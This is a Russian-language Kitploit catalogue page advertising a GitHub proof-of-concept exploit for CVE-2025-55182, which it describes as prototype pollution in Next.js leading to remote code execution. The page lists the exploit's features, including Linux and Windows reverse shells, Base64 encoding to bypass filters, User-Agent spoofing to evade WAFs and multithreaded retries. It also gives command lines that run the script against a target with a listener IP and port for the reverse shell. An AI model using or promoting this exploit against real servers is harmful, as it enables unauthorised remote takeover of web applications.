Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182 — Poc для CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/0xn7y/cve-2025-55182
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

Poc для CVE-2025-55182

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Загрязнение прототипа в Next.js

CVE-2025-55182 — это критическая уязвимость загрязнения прототипа в nextjs, которая позволяет выполнение удаленного кода (RCE) через неправильную санитацию ввода в механизме обработки запросов фреймворка. Вся проблема в том, что nextjs доверяет JSON-объектам как наивный новичок.

POC

root@kitploit:~
1) Загрязнение прототипа при разборе запросов: nextjs неправильно санирует объекты, которые могут загрязнить цепочку прототипов

2) Небезопасная десериализация: фреймворк позволяет JSON-объектам изменять прототипы базовых объектов

3) RCE через child_process путем загрязнения цепочки прототипов: как только прототип загрязнен, мы можем перехватить логику и заставить сервер выполнять код

Настройка

root@kitploit:~
npm create [email protected] vuln

Основные возможности эксплойта

root@kitploit:~
1) Полезные нагрузки Reverse Shell: Linux/Win обратные оболочки
2) Кодирование Base64 для обхода фильтров
3) Автоматическое определение ОС
4) Случайные User-Agent для уклонения от WAF
5) Циклы повторных попыток в случае сбоя с экспоненциальной задержкой
6) Многопоточность для параллельных попыток эксплуатации для надежности
Скачать инструмент

С кодированием Base64 (обход)

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

Агрессивный режим с повторными попытками

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

Отключение случайного User-Agent

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof